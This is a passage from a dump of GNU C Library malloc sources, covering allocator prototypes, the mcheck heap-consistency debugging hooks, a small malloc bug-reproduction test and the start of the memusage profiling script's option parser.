mp_.n_mmaps_max = ms->n_mmaps_max; 612 | mp_.mmap_threshold = ms->mmap_threshold; 613 | check_action = ms->check_action; 614 | main_arena.max_system_mem = ms->max_sbrked_mem; 615 | mp_.n_mmaps = ms->n_mmaps; 616 | mp_.max_n_mmaps = ms->max_n_mmaps; 617 | mp_.mmapped_mem = ms->mmapped_mem; 618 | mp_.max_mmapped_mem = ms->max_mmapped_mem; 619 | /* add version-dependent code here */ 620 | if (ms->version >= 1) 621 | { 622 | /* Check whether it is safe to enable malloc checking, or whether 623 | it is necessary to disable it. */ 624 | if (ms->using_malloc_checking && !using_malloc_checking && 625 | !disallow_malloc_check) 626 | __malloc_check_init (); 627 | else if (!ms->using_malloc_checking && using_malloc_checking) 628 | { 629 | __malloc_hook = NULL; 630 | __free_hook = NULL; 631 | __realloc_hook = NULL; 632 | __memalign_hook = NULL; 633 | using_malloc_checking = 0; 634 | } 635 | } 636 | if (ms->version >= 4) 637 | { 638 | mp_.arena_test = ms->arena_test; 639 | mp_.arena_max = ms->arena_max; 640 | narenas = ms->narenas; 641 | } 642 | check_malloc_state (&main_arena); 643 | 644 | (void) mutex_unlock (&main_arena.mutex); 645 | return 0; 646 | } 647 | 648 | /* 649 | * Local variables: 650 | * c-basic-offset: 2 651 | * End: 652 | */ 653 | -------------------------------------------------------------------------------- /glibc/malloc/malloc.h: -------------------------------------------------------------------------------- 1 | /* Prototypes and definition for malloc implementation. 2 | Copyright (C) 1996-2014 Free Software Foundation, Inc. 3 | This file is part of the GNU C Library. 4 | 5 | The GNU C Library is free software; you can redistribute it and/or 6 | modify it under the terms of the GNU Lesser General Public 7 | License as published by the Free Software Foundation; either 8 | version 2.1 of the License, or (at your option) any later version. 9 | 10 | The GNU C Library is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | Lesser General Public License for more details. 14 | 15 | You should have received a copy of the GNU Lesser General Public 16 | License along with the GNU C Library; if not, see 17 | . */ 18 | 19 | #ifndef _MALLOC_H 20 | #define _MALLOC_H 1 21 | 22 | #include 23 | #include 24 | #include 25 | 26 | #ifdef _LIBC 27 | # define __MALLOC_HOOK_VOLATILE 28 | # define __MALLOC_DEPRECATED 29 | #else 30 | # define __MALLOC_HOOK_VOLATILE volatile 31 | # define __MALLOC_DEPRECATED __attribute_deprecated__ 32 | #endif 33 | 34 | 35 | __BEGIN_DECLS 36 | 37 | /* Allocate SIZE bytes of memory. */ 38 | extern void *malloc (size_t __size) __THROW __attribute_malloc__ __wur; 39 | 40 | /* Allocate NMEMB elements of SIZE bytes each, all initialized to 0. */ 41 | extern void *calloc (size_t __nmemb, size_t __size) 42 | __THROW __attribute_malloc__ __wur; 43 | 44 | /* Re-allocate the previously allocated block in __ptr, making the new 45 | block SIZE bytes long. */ 46 | /* __attribute_malloc__ is not used, because if realloc returns 47 | the same pointer that was passed to it, aliasing needs to be allowed 48 | between objects pointed by the old and new pointers. */ 49 | extern void *realloc (void *__ptr, size_t __size) 50 | __THROW __attribute_warn_unused_result__; 51 | 52 | /* Free a block allocated by `malloc', `realloc' or `calloc'. */ 53 | extern void free (void *__ptr) __THROW; 54 | 55 | /* Free a block allocated by `calloc'. */ 56 | extern void cfree (void *__ptr) __THROW; 57 | 58 | /* Allocate SIZE bytes allocated to ALIGNMENT bytes. */ 59 | extern void *memalign (size_t __alignment, size_t __size) 60 | __THROW __attribute_malloc__ __wur; 61 | 62 | /* Allocate SIZE bytes on a page boundary. */ 63 | extern void *valloc (size_t __size) __THROW __attribute_malloc__ __wur; 64 | 65 | /* Equivalent to valloc(minimum-page-that-holds(n)), that is, round up 66 | __size to nearest pagesize. */ 67 | extern void *pvalloc (size_t __size) __THROW __attribute_malloc__ __wur; 68 | 69 | /* Underlying allocation function; successive calls should return 70 | contiguous pieces of memory. */ 71 | extern void *(*__morecore) (ptrdiff_t __size); 72 | 73 | /* Default value of `__morecore'. */ 74 | extern void *__default_morecore (ptrdiff_t __size) 75 | __THROW __attribute_malloc__; 76 | 77 | /* SVID2/XPG mallinfo structure */ 78 | 79 | struct mallinfo 80 | { 81 | int arena; /* non-mmapped space allocated from system */ 82 | int ordblks; /* number of free chunks */ 83 | int smblks; /* number of fastbin blocks */ 84 | int hblks; /* number of mmapped regions */ 85 | int hblkhd; /* space in mmapped regions */ 86 | int usmblks; /* maximum total allocated space */ 87 | int fsmblks; /* space available in freed fastbin blocks */ 88 | int uordblks; /* total allocated space */ 89 | int fordblks; /* total free space */ 90 | int keepcost; /* top-most, releasable (via malloc_trim) space */ 91 | }; 92 | 93 | /* Returns a copy of the updated current mallinfo. */ 94 | extern struct mallinfo mallinfo (void) __THROW; 95 | 96 | /* SVID2/XPG mallopt options */ 97 | #ifndef M_MXFAST 98 | # define M_MXFAST 1 /* maximum request size for "fastbins" */ 99 | #endif 100 | #ifndef M_NLBLKS 101 | # define M_NLBLKS 2 /* UNUSED in this malloc */ 102 | #endif 103 | #ifndef M_GRAIN 104 | # define M_GRAIN 3 /* UNUSED in this malloc */ 105 | #endif 106 | #ifndef M_KEEP 107 | # define M_KEEP 4 /* UNUSED in this malloc */ 108 | #endif 109 | 110 | /* mallopt options that actually do something */ 111 | #define M_TRIM_THRESHOLD -1 112 | #define M_TOP_PAD -2 113 | #define M_MMAP_THRESHOLD -3 114 | #define M_MMAP_MAX -4 115 | #define M_CHECK_ACTION -5 116 | #define M_PERTURB -6 117 | #define M_ARENA_TEST -7 118 | #define M_ARENA_MAX -8 119 | 120 | /* General SVID/XPG interface to tunable parameters. */ 121 | extern int mallopt (int __param, int __val) __THROW; 122 | 123 | /* Release all but __pad bytes of freed top-most memory back to the 124 | system. Return 1 if successful, else 0. */ 125 | extern int malloc_trim (size_t __pad) __THROW; 126 | 127 | /* Report the number of usable allocated bytes associated with allocated 128 | chunk __ptr. */ 129 | extern size_t malloc_usable_size (void *__ptr) __THROW; 130 | 131 | /* Prints brief summary statistics on stderr. */ 132 | extern void malloc_stats (void) __THROW; 133 | 134 | /* Output information about state of allocator to stream FP. */ 135 | extern int malloc_info (int __options, FILE *__fp) __THROW; 136 | 137 | /* Record the state of all malloc variables in an opaque data structure. */ 138 | extern void *malloc_get_state (void) __THROW; 139 | 140 | /* Restore the state of all malloc variables from data obtained with 141 | malloc_get_state(). */ 142 | extern int malloc_set_state (void *__ptr) __THROW; 143 | 144 | /* Called once when malloc is initialized; redefining this variable in 145 | the application provides the preferred way to set up the hook 146 | pointers. */ 147 | extern void (*__MALLOC_HOOK_VOLATILE __malloc_initialize_hook) (void) 148 | __MALLOC_DEPRECATED; 149 | /* Hooks for debugging and user-defined versions. */ 150 | extern void (*__MALLOC_HOOK_VOLATILE __free_hook) (void *__ptr, 151 | const void *) 152 | __MALLOC_DEPRECATED; 153 | extern void *(*__MALLOC_HOOK_VOLATILE __malloc_hook)(size_t __size, 154 | const void *) 155 | __MALLOC_DEPRECATED; 156 | extern void *(*__MALLOC_HOOK_VOLATILE __realloc_hook)(void *__ptr, 157 | size_t __size, 158 | const void *) 159 | __MALLOC_DEPRECATED; 160 | extern void *(*__MALLOC_HOOK_VOLATILE __memalign_hook)(size_t __alignment, 161 | size_t __size, 162 | const void *) 163 | __MALLOC_DEPRECATED; 164 | extern void (*__MALLOC_HOOK_VOLATILE __after_morecore_hook) (void); 165 | 166 | /* Activate a standard set of debugging hooks. */ 167 | extern void __malloc_check_init (void) __THROW __MALLOC_DEPRECATED; 168 | 169 | 170 | __END_DECLS 171 | #endif /* malloc.h */ 172 | -------------------------------------------------------------------------------- /glibc/malloc/mallocbug.c: -------------------------------------------------------------------------------- 1 | /* Reproduce a GNU malloc bug. */ 2 | #include 3 | #include 4 | #include 5 | 6 | #define size_t unsigned int 7 | 8 | /* Defined as global variables to avoid warnings about unused variables. */ 9 | char *dummy0; 10 | char *dummy1; 11 | char *fill_info_table1; 12 | 13 | 14 | int 15 | main (int argc, char *argv[]) 16 | { 17 | char *over_top; 18 | size_t over_top_size = 0x3000; 19 | char *over_top_dup; 20 | size_t over_top_dup_size = 0x7000; 21 | char *x; 22 | size_t i; 23 | 24 | /* Here's what memory is supposed to look like (hex): 25 | size contents 26 | 3000 original_info_table, later fill_info_table1 27 | 3fa000 dummy0 28 | 3fa000 dummy1 29 | 6000 info_table_2 30 | 3000 over_top 31 | 32 | */ 33 | /* mem: original_info_table */ 34 | dummy0 = malloc (0x3fa000); 35 | /* mem: original_info_table, dummy0 */ 36 | dummy1 = malloc (0x3fa000); 37 | /* mem: free, dummy0, dummy1, info_table_2 */ 38 | fill_info_table1 = malloc (0x3000); 39 | /* mem: fill_info_table1, dummy0, dummy1, info_table_2 */ 40 | 41 | x = malloc (0x1000); 42 | free (x); 43 | /* mem: fill_info_table1, dummy0, dummy1, info_table_2, freexx */ 44 | 45 | /* This is what loses; info_table_2 and freexx get combined unbeknownst 46 | to mmalloc, and mmalloc puts over_top in a section of memory which 47 | is on the free list as part of another block (where info_table_2 had 48 | been). */ 49 | over_top = malloc (over_top_size); 50 | over_top_dup = malloc (over_top_dup_size); 51 | memset (over_top, 0, over_top_size); 52 | memset (over_top_dup, 1, over_top_dup_size); 53 | 54 | for (i = 0; i < over_top_size; ++i) 55 | if (over_top[i] != 0) 56 | { 57 | printf ("FAIL: malloc expands info table\n"); 58 | return 0; 59 | } 60 | 61 | for (i = 0; i < over_top_dup_size; ++i) 62 | if (over_top_dup[i] != 1) 63 | { 64 | printf ("FAIL: malloc expands info table\n"); 65 | return 0; 66 | } 67 | 68 | printf ("PASS: malloc expands info table\n"); 69 | return 0; 70 | } 71 | -------------------------------------------------------------------------------- /glibc/malloc/mcheck-init.c: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 1991-2014 Free Software Foundation, Inc. 2 | This file is part of the GNU C Library. 3 | 4 | The GNU C Library is free software; you can redistribute it and/or 5 | modify it under the terms of the GNU Lesser General Public 6 | License as published by the Free Software Foundation; either 7 | version 2.1 of the License, or (at your option) any later version. 8 | 9 | The GNU C Library is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 12 | Lesser General Public License for more details. 13 | 14 | You should have received a copy of the GNU Lesser General Public 15 | License along with the GNU C Library; if not, see 16 | . */ 17 | 18 | /* The object of this file should be installed as libmcheck.a, 19 | so one can do -lmcheck to turn on mcheck. */ 20 | 21 | #include 22 | #include 23 | 24 | static void 25 | turn_on_mcheck (void) 26 | { 27 | mcheck (NULL); 28 | } 29 | 30 | void (*__malloc_initialize_hook) (void) = turn_on_mcheck; 31 | -------------------------------------------------------------------------------- /glibc/malloc/mcheck.c: -------------------------------------------------------------------------------- 1 | /* Standard debugging hooks for `malloc'. 2 | Copyright (C) 1990-2014 Free Software Foundation, Inc. 3 | This file is part of the GNU C Library. 4 | Written May 1989 by Mike Haertel. 5 | 6 | The GNU C Library is free software; you can redistribute it and/or 7 | modify it under the terms of the GNU Lesser General Public 8 | License as published by the Free Software Foundation; either 9 | version 2.1 of the License, or (at your option) any later version. 10 | 11 | The GNU C Library is distributed in the hope that it will be useful, 12 | but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 14 | Lesser General Public License for more details. 15 | 16 | You should have received a copy of the GNU Lesser General Public 17 | License along with the GNU C Library; if not, see 18 | . */ 19 | 20 | #ifndef _MALLOC_INTERNAL 21 | # define _MALLOC_INTERNAL 22 | # include 23 | # include 24 | # include 25 | # include 26 | # include 27 | # include 28 | #endif 29 | 30 | /* Old hook values. */ 31 | static void (*old_free_hook)(__ptr_t ptr, const __ptr_t); 32 | static __ptr_t (*old_malloc_hook) (size_t size, const __ptr_t); 33 | static __ptr_t (*old_memalign_hook) (size_t alignment, size_t size, 34 | const __ptr_t); 35 | static __ptr_t (*old_realloc_hook) (__ptr_t ptr, size_t size, 36 | const __ptr_t); 37 | 38 | /* Function to call when something awful happens. */ 39 | static void (*abortfunc) (enum mcheck_status); 40 | 41 | /* Arbitrary magical numbers. */ 42 | #define MAGICWORD 0xfedabeeb 43 | #define MAGICFREE 0xd8675309 44 | #define MAGICBYTE ((char) 0xd7) 45 | #define MALLOCFLOOD ((char) 0x93) 46 | #define FREEFLOOD ((char) 0x95) 47 | 48 | struct hdr 49 | { 50 | size_t size; /* Exact size requested by user. */ 51 | unsigned long int magic; /* Magic number to check header integrity. */ 52 | struct hdr *prev; 53 | struct hdr *next; 54 | __ptr_t block; /* Real block allocated, for memalign. */ 55 | unsigned long int magic2; /* Extra, keeps us doubleword aligned. */ 56 | }; 57 | 58 | /* This is the beginning of the list of all memory blocks allocated. 59 | It is only constructed if the pedantic testing is requested. */ 60 | static struct hdr *root; 61 | 62 | static int mcheck_used; 63 | 64 | /* Nonzero if pedentic checking of all blocks is requested. */ 65 | static int pedantic; 66 | 67 | #if defined _LIBC || defined STDC_HEADERS || defined USG 68 | # include 69 | # define flood memset 70 | #else 71 | static void flood (__ptr_t, int, size_t); 72 | static void flood (ptr, val, size) 73 | __ptr_t ptr; 74 | int val; 75 | size_t size; 76 | { 77 | char *cp = ptr; 78 | while (size--) 79 | *cp++ = val; 80 | } 81 | #endif 82 | 83 | static enum mcheck_status 84 | checkhdr (const struct hdr *hdr) 85 | { 86 | enum mcheck_status status; 87 | 88 | if (!mcheck_used) 89 | /* Maybe the mcheck used is disabled? This happens when we find 90 | an error and report it. */ 91 | return MCHECK_OK; 92 | 93 | switch (hdr->magic ^ ((uintptr_t) hdr->prev + (uintptr_t) hdr->next)) 94 | { 95 | default: 96 | status = MCHECK_HEAD; 97 | break; 98 | case MAGICFREE: 99 | status = MCHECK_FREE; 100 | break; 101 | case MAGICWORD: 102 | if (((char *) &hdr[1])[hdr->size] != MAGICBYTE) 103 | status = MCHECK_TAIL; 104 | else if ((hdr->magic2 ^ (uintptr_t) hdr->block) != MAGICWORD) 105 | status = MCHECK_HEAD; 106 | else 107 | status = MCHECK_OK; 108 | break; 109 | } 110 | if (status != MCHECK_OK) 111 | { 112 | mcheck_used = 0; 113 | (*abortfunc) (status); 114 | mcheck_used = 1; 115 | } 116 | return status; 117 | } 118 | 119 | void 120 | mcheck_check_all (void) 121 | { 122 | /* Walk through all the active blocks and test whether they were tampered 123 | with. */ 124 | struct hdr *runp = root; 125 | 126 | /* Temporarily turn off the checks. */ 127 | pedantic = 0; 128 | 129 | while (runp != NULL) 130 | { 131 | (void) checkhdr (runp); 132 | 133 | runp = runp->next; 134 | } 135 | 136 | /* Turn checks on again. */ 137 | pedantic = 1; 138 | } 139 | #ifdef _LIBC 140 | libc_hidden_def (mcheck_check_all) 141 | #endif 142 | 143 | static void 144 | unlink_blk (struct hdr *ptr) 145 | { 146 | if (ptr->next != NULL) 147 | { 148 | ptr->next->prev = ptr->prev; 149 | ptr->next->magic = MAGICWORD ^ ((uintptr_t) ptr->next->prev 150 | + (uintptr_t) ptr->next->next); 151 | } 152 | if (ptr->prev != NULL) 153 | { 154 | ptr->prev->next = ptr->next; 155 | ptr->prev->magic = MAGICWORD ^ ((uintptr_t) ptr->prev->prev 156 | + (uintptr_t) ptr->prev->next); 157 | } 158 | else 159 | root = ptr->next; 160 | } 161 | 162 | static void 163 | link_blk (struct hdr *hdr) 164 | { 165 | hdr->prev = NULL; 166 | hdr->next = root; 167 | root = hdr; 168 | hdr->magic = MAGICWORD ^ (uintptr_t) hdr->next; 169 | 170 | /* And the next block. */ 171 | if (hdr->next != NULL) 172 | { 173 | hdr->next->prev = hdr; 174 | hdr->next->magic = MAGICWORD ^ ((uintptr_t) hdr 175 | + (uintptr_t) hdr->next->next); 176 | } 177 | } 178 | static void 179 | freehook (__ptr_t ptr, const __ptr_t caller) 180 | { 181 | if (pedantic) 182 | mcheck_check_all (); 183 | if (ptr) 184 | { 185 | struct hdr *hdr = ((struct hdr *) ptr) - 1; 186 | checkhdr (hdr); 187 | hdr->magic = MAGICFREE; 188 | hdr->magic2 = MAGICFREE; 189 | unlink_blk (hdr); 190 | hdr->prev = hdr->next = NULL; 191 | flood (ptr, FREEFLOOD, hdr->size); 192 | ptr = hdr->block; 193 | } 194 | __free_hook = old_free_hook; 195 | if (old_free_hook != NULL) 196 | (*old_free_hook)(ptr, caller); 197 | else 198 | free (ptr); 199 | __free_hook = freehook; 200 | } 201 | 202 | static __ptr_t 203 | mallochook (size_t size, const __ptr_t caller) 204 | { 205 | struct hdr *hdr; 206 | 207 | if (pedantic) 208 | mcheck_check_all (); 209 | 210 | if (size > ~((size_t) 0) - (sizeof (struct hdr) + 1)) 211 | { 212 | __set_errno (ENOMEM); 213 | return NULL; 214 | } 215 | 216 | __malloc_hook = old_malloc_hook; 217 | if (old_malloc_hook != NULL) 218 | hdr = (struct hdr *) (*old_malloc_hook)(sizeof (struct hdr) + size + 1, 219 | caller); 220 | else 221 | hdr = (struct hdr *) malloc (sizeof (struct hdr) + size + 1); 222 | __malloc_hook = mallochook; 223 | if (hdr == NULL) 224 | return NULL; 225 | 226 | hdr->size = size; 227 | link_blk (hdr); 228 | hdr->block = hdr; 229 | hdr->magic2 = (uintptr_t) hdr ^ MAGICWORD; 230 | ((char *) &hdr[1])[size] = MAGICBYTE; 231 | flood ((__ptr_t) (hdr + 1), MALLOCFLOOD, size); 232 | return (__ptr_t) (hdr + 1); 233 | } 234 | 235 | static __ptr_t 236 | memalignhook (size_t alignment, size_t size, 237 | const __ptr_t caller) 238 | { 239 | struct hdr *hdr; 240 | size_t slop; 241 | char *block; 242 | 243 | if (pedantic) 244 | mcheck_check_all (); 245 | 246 | slop = (sizeof *hdr + alignment - 1) & - alignment; 247 | 248 | if (size > ~((size_t) 0) - (slop + 1)) 249 | { 250 | __set_errno (ENOMEM); 251 | return NULL; 252 | } 253 | 254 | __memalign_hook = old_memalign_hook; 255 | if (old_memalign_hook != NULL) 256 | block = (*old_memalign_hook)(alignment, slop + size + 1, caller); 257 | else 258 | block = memalign (alignment, slop + size + 1); 259 | __memalign_hook = memalignhook; 260 | if (block == NULL) 261 | return NULL; 262 | 263 | hdr = ((struct hdr *) (block + slop)) - 1; 264 | 265 | hdr->size = size; 266 | link_blk (hdr); 267 | hdr->block = (__ptr_t) block; 268 | hdr->magic2 = (uintptr_t) block ^ MAGICWORD; 269 | ((char *) &hdr[1])[size] = MAGICBYTE; 270 | flood ((__ptr_t) (hdr + 1), MALLOCFLOOD, size); 271 | return (__ptr_t) (hdr + 1); 272 | } 273 | 274 | static __ptr_t 275 | reallochook (__ptr_t ptr, size_t size, const __ptr_t caller) 276 | { 277 | if (size == 0) 278 | { 279 | freehook (ptr, caller); 280 | return NULL; 281 | } 282 | 283 | struct hdr *hdr; 284 | size_t osize; 285 | 286 | if (pedantic) 287 | mcheck_check_all (); 288 | 289 | if (size > ~((size_t) 0) - (sizeof (struct hdr) + 1)) 290 | { 291 | __set_errno (ENOMEM); 292 | return NULL; 293 | } 294 | 295 | if (ptr) 296 | { 297 | hdr = ((struct hdr *) ptr) - 1; 298 | osize = hdr->size; 299 | 300 | checkhdr (hdr); 301 | unlink_blk (hdr); 302 | if (size < osize) 303 | flood ((char *) ptr + size, FREEFLOOD, osize - size); 304 | } 305 | else 306 | { 307 | osize = 0; 308 | hdr = NULL; 309 | } 310 | __free_hook = old_free_hook; 311 | __malloc_hook = old_malloc_hook; 312 | __memalign_hook = old_memalign_hook; 313 | __realloc_hook = old_realloc_hook; 314 | if (old_realloc_hook != NULL) 315 | hdr = (struct hdr *) (*old_realloc_hook)((__ptr_t) hdr, 316 | sizeof (struct hdr) + size + 1, 317 | caller); 318 | else 319 | hdr = (struct hdr *) realloc ((__ptr_t) hdr, 320 | sizeof (struct hdr) + size + 1); 321 | __free_hook = freehook; 322 | __malloc_hook = mallochook; 323 | __memalign_hook = memalignhook; 324 | __realloc_hook = reallochook; 325 | if (hdr == NULL) 326 | return NULL; 327 | 328 | hdr->size = size; 329 | link_blk (hdr); 330 | hdr->block = hdr; 331 | hdr->magic2 = (uintptr_t) hdr ^ MAGICWORD; 332 | ((char *) &hdr[1])[size] = MAGICBYTE; 333 | if (size > osize) 334 | flood ((char *) (hdr + 1) + osize, MALLOCFLOOD, size - osize); 335 | return (__ptr_t) (hdr + 1); 336 | } 337 | 338 | __attribute__ ((noreturn)) 339 | static void 340 | mabort (enum mcheck_status status) 341 | { 342 | const char *msg; 343 | switch (status) 344 | { 345 | case MCHECK_OK: 346 | msg = _ ("memory is consistent, library is buggy\n"); 347 | break; 348 | case MCHECK_HEAD: 349 | msg = _ ("memory clobbered before allocated block\n"); 350 | break; 351 | case MCHECK_TAIL: 352 | msg = _ ("memory clobbered past end of allocated block\n"); 353 | break; 354 | case MCHECK_FREE: 355 | msg = _ ("block freed twice\n"); 356 | break; 357 | default: 358 | msg = _ ("bogus mcheck_status, library is buggy\n"); 359 | break; 360 | } 361 | #ifdef _LIBC 362 | __libc_fatal (msg); 363 | #else 364 | fprintf (stderr, "mcheck: %s", msg); 365 | fflush (stderr); 366 | abort (); 367 | #endif 368 | } 369 | 370 | /* Memory barrier so that GCC does not optimize out the argument. */ 371 | #define malloc_opt_barrier(x) \ 372 | ({ __typeof (x) __x = x; __asm ("" : "+m" (__x)); __x; }) 373 | 374 | int mcheck (func) 375 | void (*func)(enum mcheck_status); 376 | { 377 | abortfunc = (func != NULL) ? func : &mabort; 378 | 379 | /* These hooks may not be safely inserted if malloc is already in use. */ 380 | if (__malloc_initialized <= 0 && !mcheck_used) 381 | { 382 | /* We call malloc() once here to ensure it is initialized. */ 383 | void *p = malloc (0); 384 | /* GCC might optimize out the malloc/free pair without a barrier. */ 385 | p = malloc_opt_barrier (p); 386 | free (p); 387 | 388 | old_free_hook = __free_hook; 389 | __free_hook = freehook; 390 | old_malloc_hook = __malloc_hook; 391 | __malloc_hook = mallochook; 392 | old_memalign_hook = __memalign_hook; 393 | __memalign_hook = memalignhook; 394 | old_realloc_hook = __realloc_hook; 395 | __realloc_hook = reallochook; 396 | mcheck_used = 1; 397 | } 398 | 399 | return mcheck_used ? 0 : -1; 400 | } 401 | #ifdef _LIBC 402 | libc_hidden_def (mcheck) 403 | #endif 404 | 405 | int mcheck_pedantic (func) 406 | void (*func)(enum mcheck_status); 407 | { 408 | int res = mcheck (func); 409 | if (res == 0) 410 | pedantic = 1; 411 | return res; 412 | } 413 | 414 | enum mcheck_status 415 | mprobe (__ptr_t ptr) 416 | { 417 | return mcheck_used ? checkhdr (((struct hdr *) ptr) - 1) : MCHECK_DISABLED; 418 | } 419 | -------------------------------------------------------------------------------- /glibc/malloc/mcheck.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 1996-2014 Free Software Foundation, Inc. 2 | This file is part of the GNU C Library. 3 | 4 | The GNU C Library is free software; you can redistribute it and/or 5 | modify it under the terms of the GNU Lesser General Public 6 | License as published by the Free Software Foundation; either 7 | version 2.1 of the License, or (at your option) any later version. 8 | 9 | The GNU C Library is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 12 | Lesser General Public License for more details. 13 | 14 | You should have received a copy of the GNU Lesser General Public 15 | License along with the GNU C Library; if not, see 16 | . */ 17 | 18 | #ifndef _MCHECK_H 19 | #define _MCHECK_H 1 20 | 21 | #include 22 | 23 | __BEGIN_DECLS 24 | 25 | /* Return values for `mprobe': these are the kinds of inconsistencies that 26 | `mcheck' enables detection of. */ 27 | enum mcheck_status 28 | { 29 | MCHECK_DISABLED = -1, /* Consistency checking is not turned on. */ 30 | MCHECK_OK, /* Block is fine. */ 31 | MCHECK_FREE, /* Block freed twice. */ 32 | MCHECK_HEAD, /* Memory before the block was clobbered. */ 33 | MCHECK_TAIL /* Memory after the block was clobbered. */ 34 | }; 35 | 36 | 37 | /* Activate a standard collection of debugging hooks. This must be called 38 | before `malloc' is ever called. ABORTFUNC is called with an error code 39 | (see enum above) when an inconsistency is detected. If ABORTFUNC is 40 | null, the standard function prints on stderr and then calls `abort'. */ 41 | extern int mcheck (void (*__abortfunc)(enum mcheck_status)) __THROW; 42 | 43 | /* Similar to `mcheck' but performs checks for all block whenever one of 44 | the memory handling functions is called. This can be very slow. */ 45 | extern int mcheck_pedantic (void (*__abortfunc)(enum mcheck_status)) __THROW; 46 | 47 | /* Force check of all blocks now. */ 48 | extern void mcheck_check_all (void); 49 | 50 | /* Check for aberrations in a particular malloc'd block. You must have 51 | called `mcheck' already. These are the same checks that `mcheck' does 52 | when you free or reallocate a block. */ 53 | extern enum mcheck_status mprobe (void *__ptr) __THROW; 54 | 55 | /* Activate a standard collection of tracing hooks. */ 56 | extern void mtrace (void) __THROW; 57 | extern void muntrace (void) __THROW; 58 | 59 | __END_DECLS 60 | #endif /* mcheck.h */ 61 | -------------------------------------------------------------------------------- /glibc/malloc/memusage.sh: -------------------------------------------------------------------------------- 1 | #! @BASH@ 2 | # Copyright (C) 1999-2014 Free Software Foundation, Inc. 3 | # This file is part of the GNU C Library. 4 | # Contributed by Ulrich Drepper , 1999. 5 | 6 | # The GNU C Library is free software; you can redistribute it and/or 7 | # modify it under the terms of the GNU Lesser General Public 8 | # License as published by the Free Software Foundation; either 9 | # version 2.1 of the License, or (at your option) any later version. 10 | 11 | # The GNU C Library is distributed in the hope that it will be useful, 12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 14 | # Lesser General Public License for more details. 15 | 16 | # You should have received a copy of the GNU Lesser General Public 17 | # License along with the GNU C Library; if not, see 18 | # . 19 | 20 | memusageso='@SLIBDIR@/libmemusage.so' 21 | memusagestat='@BINDIR@/memusagestat' 22 | TEXTDOMAIN=libc 23 | 24 | # Print usage message. 25 | do_usage() { 26 | printf >&2 $"Try \`%s --help' or \`%s --usage' for more information.\n" memusage memusage 27 | exit 1 28 | } 29 | 30 | # Message for missing argument. 31 | do_missing_arg() { 32 | printf >&2 $"%s: option '%s' requires an argument\n" memusage "$1" 33 | do_usage 34 | } 35 | 36 | # Print help message 37 | do_help() { 38 | echo $"Usage: memusage [OPTION]... PROGRAM [PROGRAMOPTION]... 39 | Profile memory usage of PROGRAM. 40 | 41 | -n,--progname=NAME Name of the program file to profile 42 | -p,--png=FILE Generate PNG graphic and store it in FILE 43 | -d,--data=FILE Generate binary data file and store it in FILE 44 | -u,--unbuffered Don't buffer output 45 | -b,--buffer=SIZE Collect SIZE entries before writing them out 46 | --no-timer Don't collect additional information through timer 47 | -m,--mmap Also trace mmap & friends 48 | 49 | -?,--help Print this help and exit 50 | --usage Give a short usage message 51 | -V,--version Print version information and exit 52 | 53 | The following options only apply when generating graphical output: 54 | -t,--time-based Make graph linear in time 55 | -T,--total Also draw graph of total memory use 56 | --title=STRING Use STRING as title of the graph 57 | -x,--x-size=SIZE Make graphic SIZE pixels wide 58 | -y,--y-size=SIZE Make graphic SIZE pixels high 59 | 60 | Mandatory arguments to long options are also mandatory for any corresponding 61 | short options. 62 | 63 | " 64 | printf $"For bug reporting instructions, please see:\\n%s.\\n" \ 65 | "@REPORT_BUGS_TO@" 66 | exit 0 67 | } 68 | 69 | do_version() { 70 | echo 'memusage @PKGVERSION@@VERSION@' 71 | printf $"Copyright (C) %s Free Software Foundation, Inc. 72 | This is free software; see the source for copying conditions. There is NO 73 | warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 74 | " "2014" 75 | printf $"Written by %s. 76 | " "Ulrich Drepper" 77 | exit 0 78 | } 79 | 80 | # These variables are local 81 | buffer= 82 | data= 83 | memusagestat_args= 84 | notimer= 85 | png= 86 | progname= 87 | tracemmap= 88 | 89 | # Process arguments. But stop as soon as the program name is found. 90 | while test $# -gt 0; do 91 | case "$1" in 92 | -V | --v | --ve | --ver | --vers | --versi | --versio | --version) 93 | do_version 94 | ;; 95 | -\? | --h | --he | --hel | --help) 96 | do_help 97 | ;; 98 | --us | --usa | --usag | --usage) 99 | echo $"Syntax: memusage [--data=FILE] [--progname=NAME] [--png=FILE] [--unbuffered] 100 | [--buffer=SIZE] [--no-timer] [--time-based] [--total] 101 | [--title=STRING] [--x-size=SIZE] [--y-size=SIZE] 102 | PROGRAM [PROGRAMOPTION]..." 103 | exit 0 104 | ;; 105 | -n | --pr | --pro | --prog | --progn | --progna | --prognam | --progname) 106 | if test $# -eq 1; then 107 | do_missing_arg $1 108 | fi 109 | shift 110 | progname="$1" 111 | ;; 112 | --pr=* | --pro=* | --prog=* | --progn=* | --progna=* | --prognam=* | --progname=*) 113 | progname=${1##*=} 114 | ;; 115 | -p | --pn | --png) 116 | if test $# -eq 1; then 117 | do_missing_arg $1 118 | fi 119 | shift 120 | png="$1" 121 | ;; 122 | --pn=* | --png=*) 123 | png=${1##*=} 124 | ;; 125 | -d | --d | --da | --dat | --data) 126 | if test $# -eq 1; then 127 | do_missing_arg $1 128 | fi 129 | shift 130 | data="$1" 131 | ;; 132 | --d=* | --da=* | --dat=* | --data=*) 133 | data=${1##*=} 134 | ;; 135 | -u | --un | --unb | --unbu | --unbuf | --unbuff | --unbuffe | --unbuffer | --unbuffere | --unbuffered) 136 | buffer=1 137 | ;; 138 | -b | --b | --bu | --buf | --buff | --buffe | --buffer) 139 | if test $# -eq 1; then 140 | do_missing_arg $1 141 | fi 142 | shift 143 | buffer="$1" 144 | ;; 145 | --b=* | --bu=* | --buf=* | --buff=* | --buffe=* | --buffer=*) 146 | buffer=${1##*=} 147 | ;; 148 | --n | --no | --no- | --no-t | --no-ti | --no-tim | --no-time | 